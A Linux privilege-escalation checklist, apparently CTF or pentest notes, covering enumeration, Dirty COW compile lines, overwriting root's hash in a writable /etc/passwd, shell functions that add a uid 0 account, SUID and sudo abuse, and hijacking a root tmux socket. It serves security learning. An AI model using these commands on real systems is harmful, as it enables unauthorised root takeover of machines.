Steps to follow after an initial foothold is found on a Linux OS.
Commands
uname -a
cat /etc/passwd
whoami
sudo -l
32bit or 64bit?
execute:
arch
file /sbin/init
uname -a (x86_64 = 64bit) (i386 or i686 = 32bit); uname -m prints just the machine type
Look in the home directory of the user with "ls -lAR". Do you find "motd.legal-displayed" (normally under ~/.cache)?
If so, the box may be vulnerable to Exploit-DB 14339 (Ubuntu PAM MOTD file tampering, CVE-2010-0832), a local root.
Run Scripts
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Linuxprivchecker
http://www.securitysift.com/download/linuxprivchecker.py
unix-privesc-check (pentestmonkey)
http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz
Kernel Exploits
What is the version of the kernel? (uname -a; uname -r prints just the version)
2.6.22 up to 4.8.2: try Dirty COW (CVE-2016-5195) first (searchsploit 2.6 cow), starting with 40616.c. The Exploit-DB titles say "2.6.22 < 3.9", but the bug reaches 4.8.2; distro kernels backport the fix, so the version number alone does not prove the box is vulnerable, the PoC either works or it doesn't.
Compile on the target if it has gcc, otherwise on a box with the same architecture and libc (don't try to use -m32 on a 64bit box for this exploit).
Else
https://www.exploit-db.com/exploits/40839/
32bit - gcc -pthread 40839.c -o 40839-32 -lcrypt -m32
64bit - gcc -pthread 40839.c -o 40839-64 -lcrypt
Both PoCs race a kernel write and can leave the box unstable: 40616 patches /usr/bin/passwd and 40839 adds a uid 0 user to /etc/passwd (each keeps a backup under /tmp), so put the originals back when you are done.
Any other 2.6.x kernel --> then "searchsploit linux kernel 2.6.x" with the exact version.
What files are world writable?
-------------------------------------------------------------------------------------------------
If /etc/passwd is writable by your user..
Then put a crypt(3) hash of a password you know into the root line and log in with it. pam_unix only consults /etc/shadow when that field holds "x", so the hash in /etc/passwd wins. Back the file up first; this locks root out of its real password.
openssl passwd sp00ks
dhaczA9zC7C5k
(that is the old DES crypt format; OpenSSL 3.x no longer produces it, use "openssl passwd -6" there, which gives a $6$ SHA-512 hash that /etc/passwd accepts just the same)
so now we copy dhaczA9zC7C5k into the password field of the root line like so...
root:dhaczA9zC7C5k:0:0:root:/root:/bin/bash
and now we can do
$ su
Password: sp00ks
root@BOX:~# id
uid=0(root) gid=0(root) groups=0(root)
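The /etc/passwd edit above, as an added example that is not from the original post: shell functions that rehearse the rewrite on a scratch copy of the file (with a backup), either by replacing root's hash or by appending a second uid 0 account. The hash generation assumes openssl passwd -6 is available; the account name "toor" and the sample passwd lines are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post. Rehearses the /etc/passwd
# overwrite on a scratch copy: set a known hash on root, or append a second
# uid 0 account. The account name "toor" and the sample passwd lines are
# constructed for the demo.

# Produce a crypt(3) hash for PASSWORD. $6$ (SHA-512) is understood by every
# glibc in use; fall back to $1$ (MD5) on an OpenSSL too old for -6.
# Either format is valid in field 2 of /etc/passwd.
gen_hash() {
    openssl passwd -6 "$1" 2>/dev/null || openssl passwd -1 "$1"
}

# Replace field 2 of root's line in FILE with HASH. FILE.bak keeps the
# original so the real password can be restored later. Once the field is
# not "x", pam_unix checks root's password against this hash, not /etc/shadow.
passwd_set_root_hash() {
    file="$1" hash="$2"
    cp -p "$file" "$file.bak" || return 1
    awk -F: -v OFS=: -v h="$hash" '$1 == "root" { $2 = h } { print }' \
        "$file.bak" > "$file"
}

# Less destructive variant (what the 40839 Dirty COW PoC does with "firefart"):
# append NAME as a second uid 0 / gid 0 user and leave root's line alone.
passwd_add_uid0() {
    file="$1" name="$2" hash="$3"
    if awk -F: -v n="$name" '$1 == n { f = 1 } END { exit !f }' "$file"; then
        echo "passwd_add_uid0: user $name already exists" >&2
        return 1
    fi
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$name" "$hash" >> "$file"
}

# Hash stored for USER in FILE, to confirm the edit took.
passwd_hash_of() {
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# Rehearsal on a constructed copy. On the target, point the functions at the
# real /etc/passwd, then "su" (root) or "su toor" with the chosen password.
demo_passwd_edit() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
    hash=$(gen_hash sp00ks)
    passwd_set_root_hash "$tmp" "$hash"
    passwd_add_uid0 "$tmp" toor "$hash"
    cat "$tmp"
    rm -f "$tmp" "$tmp.bak"
}
```

Run demo_passwd_edit to see both edits on the scratch copy. The awk rewrite keeps every other field and line untouched, which matters: a malformed /etc/passwd breaks every login on the box, including the one you came in on.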
------------------------------------------------------------------------------------------------
Check SUID
SUID - at least one of these finds should work, if not all of them:
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
Example vulnerable file
-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
The "s" in the owner's execute position is the setuid bit (not the sticky bit, which shows as "t" in the last position), the owner is root, and the file is executable by everyone: whoever runs it gets euid 0 inside it.
Most SUID binaries are standard and harmless; the interesting ones are non-standard files like this one, or standard ones that can spawn a shell or read and write arbitrary files.
So now run it: "/var/htb/bin/emergency"
and, as this particular binary spawns a shell, you should have root
# whoami
root
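The SUID finds above and the "world writable" question from the earlier section, as an added example that is not part of the original post: the same checks as shell functions that take a start directory, plus a baseline comparison that drops distro-standard SUID names so a stray one like /var/htb/bin/emergency stands out. The tree and baseline list built in demo_suid_scan are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. The SUID and world-writable
# finds from the checklist as functions that take a start directory, plus a
# baseline comparison that strips distro-standard SUID binaries so the odd
# one out stands out. The tree and baseline in demo_suid_scan are constructed.

# All regular files with the setuid bit under DIR (default /).
# -perm -4000 matches the bit whatever the rest of the mode is.
find_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# Same, restricted to root-owned files: these run with euid 0, so they come
# first. (Needs root-owned files to show anything, hence not in the demo.)
find_root_suid() {
    find "${1:-/}" -xdev -type f -user root -perm -4000 -print 2>/dev/null | sort
}

# Regular files anyone can write (o+w). A writable /etc/passwd, cron script
# or library loaded by a root process is what this is looking for.
find_world_writable() {
    find "${1:-/}" -xdev -type f -perm -0002 -print 2>/dev/null | sort
}

# SUID files under DIR whose basename is not listed in BASELINE (one name per
# line, e.g. the SUID set of a clean install of the same distro release).
# Whatever is left is non-standard and deserves a look.
unusual_suid() {
    dir="$1" baseline="$2"
    find_suid "$dir" | while IFS= read -r path; do
        grep -qxF -- "$(basename "$path")" "$baseline" || printf '%s\n' "$path"
    done
}

# Build a small tree that mimics the situation above and run the checks on it.
demo_suid_scan() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/var/htb/bin" "$root/etc"
    for f in usr/bin/passwd usr/bin/su var/htb/bin/emergency; do
        printf '#!/bin/sh\nid\n' > "$root/$f"
        chmod 4755 "$root/$f"
    done
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$root/etc/passwd"
    chmod 666 "$root/etc/passwd"          # the misconfiguration abused earlier
    printf 'passwd\nsu\n' > "$root/baseline"
    echo "SUID files:";        find_suid "$root"
    echo "world-writable:";    find_world_writable "$root"
    echo "non-standard SUID:"; unusual_suid "$root" "$root/baseline"
    rm -rf "$root"
}
```

On a real box call find_root_suid / and find_world_writable / directly; -xdev keeps find off /proc, /sys and network mounts, which is where most of the noise and the 2>/dev/null'd errors come from.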
---------------------------------------------------------------
Running SUDO permission without a password
sudo -l shows:
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
In this example the rule names a target user rather than a file: www-data can run any command as "scriptmanager" (user and group) without supplying a password, so just ask sudo for a shell as that user.
www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$
---------------------------------------------------------------
searchsploit
What services are listening only on localhost (127.0.0.1 or ::1)? Your port scan never saw them, so list the listening sockets, note each program and its version, and run searchsploit against them.
---------------------------------------------------------------
Process List (ps aux)
Tmux session running as root????
:~$ ps aux | grep tmux
root 1023 0.0 0.1 26416 1672 ? Ss Nov04 0:10 /usr/bin/tmux -S /.devs/dev_sess
(typed as "ps -aux", older procps prints "Warning: bad ps syntax, perhaps a bogus '-'?" because the dash makes it ambiguous between BSD and POSIX syntax; "ps aux" avoids it)
Connect to it - "tmux -S /.devs/dev_sess"
This only works if the socket /.devs/dev_sess is writable by you (tmux refuses a socket it cannot open), so check its owner, group and mode first. Root's own sessions normally live under /tmp/tmux-0/ with mode 700; a custom -S path outside that directory is the giveaway.
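The two checks above (services bound to loopback only, and a root tmux server whose socket you can reach), as an added example that is not part of the original post. Both functions read command output on stdin so they work on the embedded constructed ss -tlnp and ps aux lines offline; on a live box feed them the real commands. The sample ports, pids and socket paths are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. Two of the later checks on
# embedded, constructed command output so they run offline:
#   - TCP listeners bound to loopback only, which a remote port scan never saw
#   - root tmux servers with an explicit -S socket, and whether you can open it
# On a live box feed them real output:  ss -tlnp | loopback_listeners
# and                                   ps aux   | root_tmux_sockets

# stdin: "ss -tlnp" lines. Prints "port program" for every listener bound to
# 127.0.0.1 or ::1 only. The program name is what you take to searchsploit
# (together with the version from its banner or package).
loopback_listeners() {
    awk 'NR > 1 && ($4 ~ /^127\.0\.0\.1:/ || $4 ~ /^\[::1\]:/) {
            port = $4; sub(/.*:/, "", port)
            prog = "?"                       # no -p, or not our process
            if (match($0, /users:\(\("[^"]+"/))
                prog = substr($0, RSTART + 9, RLENGTH - 10)
            print port, prog
         }'
}

# stdin: "ps aux" lines. For every tmux started by root with -S SOCKET,
# prints "SOCKET attachable" if the socket is writable by the current user
# (tmux will not talk to a socket it cannot write), else "SOCKET denied".
# To attach to an attachable one:  tmux -S SOCKET attach
root_tmux_sockets() {
    awk '$1 == "root" && $11 ~ /(^|\/)tmux$/ {
            for (i = 12; i < NF; i++) if ($i == "-S") print $(i + 1)
         }' | while IFS= read -r sock; do
        if [ -w "$sock" ]; then
            printf '%s attachable\n' "$sock"
        else
            printf '%s denied\n' "$sock"
        fi
    done
}

# Constructed sample output standing in for the real commands.
demo_later_checks() {
    printf '%s\n' \
        'State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process' \
        'LISTEN 0      128    127.0.0.1:3306      0.0.0.0:*         users:(("mysqld",pid=812,fd=21))' \
        'LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=640,fd=3))' \
        'LISTEN 0      511    [::1]:8000          [::]:*            users:(("python3",pid=901,fd=4))' \
        'LISTEN 0      10     127.0.0.1:6379      0.0.0.0:*' \
        | loopback_listeners
    printf '%s\n' \
        'USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND' \
        'root 1023 0.0 0.1 26416 1672 ? Ss Nov04 0:10 /usr/bin/tmux -S /.devs/dev_sess' \
        'www-data 2000 0.0 0.1 26416 1672 ? Ss Nov04 0:10 /usr/bin/tmux -S /tmp/tmux-33/default' \
        | root_tmux_sockets
}
```

Without -p (or when the socket belongs to another user) ss shows no process column, which is why the program falls back to "?": in that case match the port against /proc/net/tcp owners or the service configs instead. A tmux started with -L rather than -S uses /tmp/tmux-UID/NAME, so it will not show up here; that directory's mode decides whether you can reach it.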
--------------------------------------------------------------
Noob here sir. Needs more explanation.
And can I use it on Termux?